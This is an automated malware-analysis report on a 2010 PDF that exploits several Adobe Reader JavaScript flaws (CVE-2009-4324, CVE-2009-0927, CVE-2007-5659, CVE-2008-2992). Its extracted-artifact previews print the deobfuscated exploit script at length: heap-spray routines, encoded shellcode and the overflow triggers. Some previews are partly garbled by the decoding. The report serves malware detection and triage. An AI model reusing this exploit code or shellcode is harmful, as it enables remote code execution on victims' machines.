Malicious PDF — malware analysis report

Static analysis result for SHA-256 7767815345ded0b4…

MALICIOUS

PDF

14.4 KB Created: 2010-02-12 22:27:59 Authoring application: Xohoubiuisasohezeho
MD5: 46089231c0693b45c131c1c6b982119f SHA-1: dd81c91ad960fbca256a380bbddf3d69d2bb0231 SHA-256: 7767815345ded0b4563c2191f4713bd8aca2d78b7f1399c389bb382b64eada61
508 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The JavaScript is designed to execute arbitrary code, likely to download and run a second-stage payload. The ClamAV detection of Js.Exploit.Shellcode-18 further supports the malicious nature of the embedded script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0019_000.js
8b81fa4d9dccfcc68da5a1b1c8e623faf0476e4e83af3d13fb7bf56b5290fd61		 pdf-javascript-stream PDF /JS object 19 at offset 0x2D91 252 bytes
Preview script
First 1,000 lines of the extracted script
var s=''; 
	var l=this.getPageNumWords(0);
    for(var i=0; i < l; i++)
	{
		s+=this.getPageNthWord(0,i) + ' ';
	}

	app.alert(s);

//	app.alert(this.info.title);
//	var obj=this.doc;
//		for(var i in obj) s+=i+' = ' + obj[i]+"\n"; 
//	app.alert(s);
generic_stage_recovery_000.js
f37650d63830f978e9ea194ed7fe6c055ee9108003ba6d392487360148c5e203		 deobfuscated-js generic stage recovery percent-decode from decompressed stream at 0x8C at offset 0x8C 7103 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
2 J
0.57 w
0.004 G
BT /F1 3.00 Tf ET
BT 5.67 831.07 Td (%afunction fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);retu%7) Tj ET
BT 31.19 816.90 Td (2n yarsp;}%afunction printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u%3) Tj ET
BT 31.19 802.72 Td (8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u045%) Tj ET
BT 31.19 788.55 Td (35%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u) Tj ET
BT 31.19 774.38 Td (0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u03%3) Tj ET
BT 31.19 760.20 Td (8A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%%) Tj ET
BT 31.19 746.03 Td (7566AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC0) Tj ET
BT 31.19 731.86 Td (33%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%2) Tj ET
BT 31.19 717.68 Td (5u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u934%) Tj ET
BT 31.19 703.51 Td (32%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memo) Tj ET
BT 31.19 689.34 Td (ry = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678%3) Tj ET
BT 31.19 675.16 Td (901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new%) Tj ET
BT 31.19 660.99 Td (20Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1) Tj ET
BT 31.19 646.82 Td (.31.34", new Date());}%afunction util_printf(){var payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%) Tj ET
BT 31.19 632.64 Td (u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uE%4) Tj ET
BT 31.19 618.47 Td (183%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%) Tj ET
BT 31.19 604.30 Td (25u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD) Tj ET
BT 31.19 590.12 Td (303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84%4) Tj ET
BT 31.19 575.95 Td (6%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u%) Tj ET
BT 31.19 561.78 Td (30455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB85) Tj ET
BT 31.19 547.60 Td (6%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var %6) Tj ET
BT 31.19 533.43 Td (eop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");%avar heapblock=nop+payload;var bigblock=unescape("%u0A0A%u%3) Tj ET
BT 31.19 519.26 Td (0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigbloc%) Tj ET
BT 31.19 505.08 Td (6b+=bigblock;}%avar fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.len%) Tj ET
BT 31.19 490.91 Td (67th-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}%avar mem_array=new Array(%) Tj ET
BT 31.19 476.74 Td (29;for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}%avar num=1299999999999999999988888888888888%) Tj ET
BT 31.19 462.56 Td (3888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888) Tj ET
BT 31.19 448.39 Td (88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888%3) Tj ET
BT 31.19 434.22 Td (88888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}%afunc%7) Tj ET
BT 31.19 420.05 Td (4ion collab_email(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%%) Tj ET
BT 31.19 405.87 Td (7509EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u73) Tj ET
BT 31.19 391.70 Td (8B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u41
... (truncated)
generic_stage_recovery_001.js
a11875bca3f14ff7331efc5fe4379e9431abfc674f2320eecdbce7e97b7dc8b9		 deobfuscated-js generic stage recovery percent-decode from decompressed stream at 0x2F3A at offset 0x2F3A 5790 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
%afunction fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}%afunction printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u9342%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memory = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());}%afunction util_printf(){var payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");%avar heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}%avar fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}%avar mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}%avar num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}%afunction collab_email(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}%avar overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}%athis.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}%afunction collab_geti
... (truncated)
generic_stage_recovery_002.js
a06725f549bf116b6ebf3f49cfeff0b54cf10ce47f68fe02864325edaf1e2070		 deobfuscated-js generic stage recovery percent-decode -> percent-decode from decompressed stream at 0x8C at offset 0x8C 7087 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
2 J
0.57 w
0.004 G
BT /F1 3.00 Tf ET
BT 5.67 831.07 Td (�unction fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);retu%7) Tj ET
BT 31.19 816.90 Td (2n yarsp;}�unction printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u%3) Tj ET
BT 31.19 802.72 Td (8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u045%) Tj ET
BT 31.19 788.55 Td (35%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u) Tj ET
BT 31.19 774.38 Td (0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u03%3) Tj ET
BT 31.19 760.20 Td (8A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%%) Tj ET
BT 31.19 746.03 Td (7566AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC0) Tj ET
BT 31.19 731.86 Td (33%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%2) Tj ET
BT 31.19 717.68 Td (5u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u934%) Tj ET
BT 31.19 703.51 Td (32%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memo) Tj ET
BT 31.19 689.34 Td (ry = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678%3) Tj ET
BT 31.19 675.16 Td (901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new%) Tj ET
BT 31.19 660.99 Td (20Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1) Tj ET
BT 31.19 646.82 Td (.31.34", new Date());}�unction util_printf(){var payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%) Tj ET
BT 31.19 632.64 Td (u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uE%4) Tj ET
BT 31.19 618.47 Td (183%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%) Tj ET
BT 31.19 604.30 Td (25u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD) Tj ET
BT 31.19 590.12 Td (303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84%4) Tj ET
BT 31.19 575.95 Td (6%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u%) Tj ET
BT 31.19 561.78 Td (30455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB85) Tj ET
BT 31.19 547.60 Td (6%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var %6) Tj ET
BT 31.19 533.43 Td (eop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");%avar heapblock=nop+payload;var bigblock=unescape("%u0A0A%u%3) Tj ET
BT 31.19 519.26 Td (0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigbloc%) Tj ET
BT 31.19 505.08 Td (6b+=bigblock;}%avar fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.len%) Tj ET
BT 31.19 490.91 Td (67th-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}%avar mem_array=new Array(%) Tj ET
BT 31.19 476.74 Td (29;for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}%avar num=1299999999999999999988888888888888%) Tj ET
BT 31.19 462.56 Td (3888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888) Tj ET
BT 31.19 448.39 Td (88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888%3) Tj ET
BT 31.19 434.22 Td (88888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);}�unc%7) Tj ET
BT 31.19 420.05 Td (4ion collab_email(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%%) Tj ET
BT 31.19 405.87 Td (7509EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u73) Tj ET
BT 31.19 391.70 Td (8B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u
... (truncated)
generic_stage_recovery_003.js
2bd9a2ebd4e611d32052e997a47a2a8ad7b1edc2138954094205c1d0c02eecfb		 deobfuscated-js generic stage recovery percent-decode -> percent-decode from decompressed stream at 0x2F3A at offset 0x2F3A 5772 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
�unction fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}�unction printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u9342%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memory = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());}�unction util_printf(){var payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");%avar heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}%avar fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}%avar mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}%avar num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);}�unction collab_email(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}%avar overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}%athis.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}�unction collab_geticon(){if(app
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.